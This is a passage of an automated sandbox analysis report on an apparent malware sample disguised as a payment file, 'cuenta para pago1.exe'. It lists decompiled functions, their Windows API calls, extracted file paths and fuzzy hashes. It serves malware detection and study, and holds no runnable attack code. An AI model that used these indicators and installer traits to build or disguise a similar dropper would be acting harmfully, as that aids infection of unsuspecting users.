                                                                                        • Part of subcall function 004062AE: CharPrevW.USER32(?,?,77573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\cuenta para pago1.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406338
                                                                                      • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,?,004206B8,?,?,000003FB,?), ref: 004047C1
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047DC
                                                                                        • Part of subcall function 00404935: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                                                                        • Part of subcall function 00404935: wsprintfW.USER32 ref: 004049DF
                                                                                        • Part of subcall function 00404935: SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$Call$&B
                                                                                      • API String ID: 2624150263-2801710114
                                                                                      • Opcode ID: 8f775fb3ea646de8834d5ea4bf79a40c8e6bb2c6a0c6d8ae6640a0167b8418f2
                                                                                      • Instruction ID: 0d30bce32a668ce4acefc1b856fca7f6450f1747cfb7256993ff8e50c76d0062
                                                                                      • Opcode Fuzzy Hash: 8f775fb3ea646de8834d5ea4bf79a40c8e6bb2c6a0c6d8ae6640a0167b8418f2
                                                                                      • Instruction Fuzzy Hash: 9BA170B1900218AFDB11AFA5DD85AAF77B8EF85314F10843BFA01B62D1D77C89418B6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                      • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4068876231.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4068842862.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4068909846.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4068953066.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$lstrcpy$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 4227406936-0
                                                                                      • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                      • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                      • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                      • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(004074E4,?,?,004074D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\, xrefs: 00402154
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\
                                                                                      • API String ID: 542301482-3308347815
                                                                                      • Opcode ID: ca950f7afeac7727567225d74bb161ffe9235428eb8415ca3734983ba85d589a
                                                                                      • Instruction ID: 3ca7e19c9ce8fc1ac7a66f6cc25710137151f8511148443d739b2fd9411afead
                                                                                      • Opcode Fuzzy Hash: ca950f7afeac7727567225d74bb161ffe9235428eb8415ca3734983ba85d589a
                                                                                      • Instruction Fuzzy Hash: C6412D71A00204AFCF00DFA4CD88AAD7BB5FF48314B2045BAF515EB2D1DB799A41CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040427B Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404319
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040432D
                                                                                      • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040434A
                                                                                      • GetSysColor.USER32(?), ref: 0040435B
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404369
                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404377
                                                                                      • lstrlenW.KERNEL32(?), ref: 0040437C
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404389
                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040439E
                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004043F7
                                                                                      • SendMessageW.USER32(00000000), ref: 004043FE
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404429
                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040446C
                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0040447A
                                                                                      • SetCursor.USER32(00000000), ref: 0040447D
                                                                                      • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,?), ref: 00404492
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040449E
                                                                                      • SetCursor.USER32(00000000), ref: 004044A1
                                                                                      • SendMessageW.USER32(00000111,?,00000000), ref: 004044D0
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004044E2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                      • String ID: Call$N$open
                                                                                      • API String ID: 3615053054-2563687911
                                                                                      • Opcode ID: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                                                                      • Instruction ID: 22110145f907261e11c2f5d787c062fb689e5c30422f2648b08f84481e86c76f
                                                                                      • Opcode Fuzzy Hash: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                                                                      • Instruction Fuzzy Hash: 567184B1900209BFDB109F60DD45B6A7B69FB94354F00843AFB01BA2D0C778AD51DFA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                      • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                      • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                      • String ID: F
                                                                                      • API String ID: 941294808-1304234792
                                                                                      • Opcode ID: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                                                                      • Instruction ID: 0e42b5f20bdf07c2dc1b789da504779860c4ba9591388ef730275887389fb1b0
                                                                                      • Opcode Fuzzy Hash: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                                                                      • Instruction Fuzzy Hash: 0C418A71804249AFCF058FA5DD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405D49 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrcpyW.KERNEL32(00425D88,NUL), ref: 00405D58
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,00405EDC,?,?), ref: 00405D7C
                                                                                      • GetShortPathNameW.KERNEL32(?,00425D88,00000400), ref: 00405D85
                                                                                        • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                                                                        • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                                                                      • GetShortPathNameW.KERNEL32(00426588,00426588,00000400), ref: 00405DA2
                                                                                      • wsprintfA.USER32 ref: 00405DC0
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405DFB
                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E0A
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E42
                                                                                      • SetFilePointer.KERNEL32(00409558,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409558,00000000,[Rename],00000000,00000000,00000000), ref: 00405E98
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405EA9
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EB0
                                                                                        • Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\cuenta para pago1.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00405BF3
                                                                                        • Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00405C15
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                                                      • API String ID: 222337774-899692902
                                                                                      • Opcode ID: d0bebfde44d1b8ec79e846926d7a4151a37a86d35e5e56b98e3bdf1b29062508
                                                                                      • Instruction ID: 320379bf9b7b256e7873fa455d25e0b3442936e7d724c6c18c2d1b17e2228676
                                                                                      • Opcode Fuzzy Hash: d0bebfde44d1b8ec79e846926d7a4151a37a86d35e5e56b98e3bdf1b29062508
                                                                                      • Instruction Fuzzy Hash: CF31FF31A04B14BFD2216B659C49F6B3A5CDF41759F14043ABA41F62D3EA3CAA008ABD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004062AE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,77573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\cuenta para pago1.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406311
                                                                                      • CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                                                                      • CharNextW.USER32(?,00000000,77573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\cuenta para pago1.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406325
                                                                                      • CharPrevW.USER32(?,?,77573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\cuenta para pago1.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406338
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004062AF
                                                                                      • *?|<>/":, xrefs: 00406300
                                                                                      • "C:\Users\user\Desktop\cuenta para pago1.exe", xrefs: 004062AE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: "C:\Users\user\Desktop\cuenta para pago1.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 589700163-4061203493
                                                                                      • Opcode ID: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                                                                      • Instruction ID: 142112f625556876e4cd031ade27854873566ffa35591fc5fadb0a313d070af9
                                                                                      • Opcode Fuzzy Hash: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                                                                      • Instruction Fuzzy Hash: 0711B616C0021299DB307B19DC40AB7A6E8EF99750B56803FED86732C1E77C5C9286BD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404145 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404162
                                                                                      • GetSysColor.USER32(00000000), ref: 0040417E
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0040418A
                                                                                      • SetBkMode.GDI32(?,?), ref: 00404196
                                                                                      • GetSysColor.USER32(?), ref: 004041A9
                                                                                      • SetBkColor.GDI32(?,?), ref: 004041B9
                                                                                      • DeleteObject.GDI32(?), ref: 004041D3
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 004041DD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      • Opcode ID: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                                                                      • Instruction ID: 030d9aaba4ad3e93a8394b0be899aa32a9dffcfc2c3f2c4c75d4aa3950b62208
                                                                                      • Opcode Fuzzy Hash: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                                                                      • Instruction Fuzzy Hash: CE21A4B5804704ABC7209F68DD48B4B7BF8AF41710F048A29F995E62E0C734E944CB55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404A43 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A5E
                                                                                      • GetMessagePos.USER32 ref: 00404A66
                                                                                      • ScreenToClient.USER32(?,?), ref: 00404A80
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A92
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AB8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      • Opcode ID: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                                                                      • Instruction ID: 24e0014d109499f5a76e1caf6b4fbcffaf68b7ceae62979d4c0808fe7bebc9aa
                                                                                      • Opcode Fuzzy Hash: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                                                                      • Instruction Fuzzy Hash: A1015271E40219BADB00DB94DD45FFEBBBCAB54711F10012BBB11F62C0D7B4A9018B95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402D22
                                                                                      • MulDiv.KERNEL32(000C7ED2,00000064,000C9BB8), ref: 00402D4D
                                                                                      • wsprintfW.USER32 ref: 00402D5D
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                      Strings
                                                                                      • verifying installer: %d%%, xrefs: 00402D57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
